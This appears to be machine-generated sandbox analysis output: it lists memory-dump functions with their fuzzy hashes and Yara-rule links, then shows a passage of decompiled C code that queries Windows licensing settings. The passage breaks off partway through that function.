Source File: 00000006.00000002.2220430056.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true

Associated: 00000006.00000002.2220420840.0000000000830000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220527396.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220532757.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220537656.0000000000934000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220543758.0000000000937000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220549325.0000000000940000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220585078.00000000009A0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446

Uniqueness

Uniqueness Score: -1.00%

Function 00850060, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2220430056.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true

Associated: 00000006.00000002.2220420840.0000000000830000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220527396.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220532757.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220537656.0000000000934000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220543758.0000000000937000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220549325.0000000000940000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220585078.00000000009A0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E

Uniqueness

Uniqueness Score: -1.00%

Function 008501D4, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2220430056.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true

Associated: 00000006.00000002.2220420840.0000000000830000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220527396.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220532757.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220537656.0000000000934000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220543758.0000000000937000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220549325.0000000000940000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220585078.00000000009A0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96

Uniqueness

Uniqueness Score: -1.00%

Function 0085010C, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2220430056.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true

Associated: 00000006.00000002.2220420840.0000000000830000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220527396.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220532757.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220537656.0000000000934000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220543758.0000000000937000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220549325.0000000000940000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220585078.00000000009A0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846

Uniqueness

Uniqueness Score: -1.00%

Function 00851148, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2220430056.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true

Associated: 00000006.00000002.2220420840.0000000000830000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220527396.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220532757.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220537656.0000000000934000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220543758.0000000000937000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220549325.0000000000940000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220585078.00000000009A0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A

Uniqueness

Uniqueness Score: -1.00%

Function 0084F8CC, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2220430056.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true

Associated: 00000006.00000002.2220420840.0000000000830000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220527396.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220532757.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220537656.0000000000934000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220543758.0000000000937000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220549325.0000000000940000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220585078.00000000009A0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697

Uniqueness

Uniqueness Score: -1.00%

Function 00851930, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2220430056.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true

Associated: 00000006.00000002.2220420840.0000000000830000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220527396.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220532757.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220537656.0000000000934000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220543758.0000000000937000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220549325.0000000000940000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220585078.00000000009A0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546

Uniqueness

Uniqueness Score: -1.00%

Function 0084F938, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2220430056.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true

Associated: 00000006.00000002.2220420840.0000000000830000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220527396.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220532757.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220537656.0000000000934000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220543758.0000000000937000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220549325.0000000000940000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220585078.00000000009A0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947

Uniqueness

Uniqueness Score: -1.00%

Function 0084FAB8, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2220430056.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true

Associated: 00000006.00000002.2220420840.0000000000830000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220527396.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220532757.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220537656.0000000000934000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220543758.0000000000937000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220549325.0000000000940000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220585078.00000000009A0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996

Uniqueness

Uniqueness Score: -1.00%

Function 0084FA20, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2220430056.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true

Associated: 00000006.00000002.2220420840.0000000000830000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220527396.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220532757.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220537656.0000000000934000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220543758.0000000000937000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220549325.0000000000940000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220585078.00000000009A0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A

Uniqueness

Uniqueness Score: -1.00%

Function 0084FA50, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2220430056.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true

Associated: 00000006.00000002.2220420840.0000000000830000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220527396.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220532757.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220537656.0000000000934000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220543758.0000000000937000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220549325.0000000000940000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220585078.00000000009A0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
Instruction ID: 2cae8b11bd858d750de1a79d340ce6dfe3ec44f87311ce0e8d0be64a47f0ebf6
Opcode Fuzzy Hash: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
Instruction Fuzzy Hash: 9BB01272100544C7E349A714DA07B8B7210FB80F00F008D3BA04782851DFB89A2CE986

Uniqueness

Uniqueness Score: -1.00%

Function 0084FBE8, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2220430056.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true

Associated: 00000006.00000002.2220420840.0000000000830000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220527396.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220532757.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220537656.0000000000934000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220543758.0000000000937000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220549325.0000000000940000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220585078.00000000009A0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986

Uniqueness

Uniqueness Score: -1.00%

Function 0084FB50, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2220430056.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true

Associated: 00000006.00000002.2220420840.0000000000830000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220527396.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220532757.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220537656.0000000000934000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220543758.0000000000937000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220549325.0000000000940000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220585078.00000000009A0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447

Uniqueness

Uniqueness Score: -1.00%

Function 0084FC30, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2220430056.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true

Associated: 00000006.00000002.2220420840.0000000000830000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220527396.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220532757.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220537656.0000000000934000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220543758.0000000000937000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220549325.0000000000940000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220585078.00000000009A0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486

Uniqueness

Uniqueness Score: -1.00%

Function 00850C40, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2220430056.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true

Associated: 00000006.00000002.2220420840.0000000000830000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220527396.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220532757.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220537656.0000000000934000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220543758.0000000000937000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220549325.0000000000940000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220585078.00000000009A0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547

Uniqueness

Uniqueness Score: -1.00%

Function 0084FC48, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2220430056.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true

Associated: 00000006.00000002.2220420840.0000000000830000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220527396.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220532757.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220537656.0000000000934000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220543758.0000000000937000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220549325.0000000000940000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220585078.00000000009A0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456

Uniqueness

Uniqueness Score: -1.00%

Function 00851D80, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2220430056.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true

Associated: 00000006.00000002.2220420840.0000000000830000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220527396.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220532757.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220537656.0000000000934000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220543758.0000000000937000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220549325.0000000000940000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220585078.00000000009A0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686

Uniqueness

Uniqueness Score: -1.00%

Function 0084FD5C, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2220430056.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true

Associated: 00000006.00000002.2220420840.0000000000830000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220527396.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220532757.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220537656.0000000000934000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220543758.0000000000937000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220549325.0000000000940000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220585078.00000000009A0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A

Uniqueness

Uniqueness Score: -1.00%

Function 0084FE24, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2220430056.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true

Associated: 00000006.00000002.2220420840.0000000000830000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220527396.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220532757.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220537656.0000000000934000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220543758.0000000000937000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220549325.0000000000940000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220585078.00000000009A0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456

Uniqueness

Uniqueness Score: -1.00%

Function 0084FFFC, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2220430056.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true

Associated: 00000006.00000002.2220420840.0000000000830000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220527396.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220532757.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220537656.0000000000934000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220543758.0000000000937000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220549325.0000000000940000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220585078.00000000009A0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B

Uniqueness

Uniqueness Score: -1.00%

Function 0084FF34, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2220430056.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true

Associated: 00000006.00000002.2220420840.0000000000830000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220527396.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220532757.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220537656.0000000000934000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220543758.0000000000937000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220549325.0000000000940000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220585078.00000000009A0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A

Uniqueness

Uniqueness Score: -1.00%

Function 00878788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00878788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E00878460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E0085E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E0087718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E00878460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E0085E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E0087718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E00878460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E00878460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E00878460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
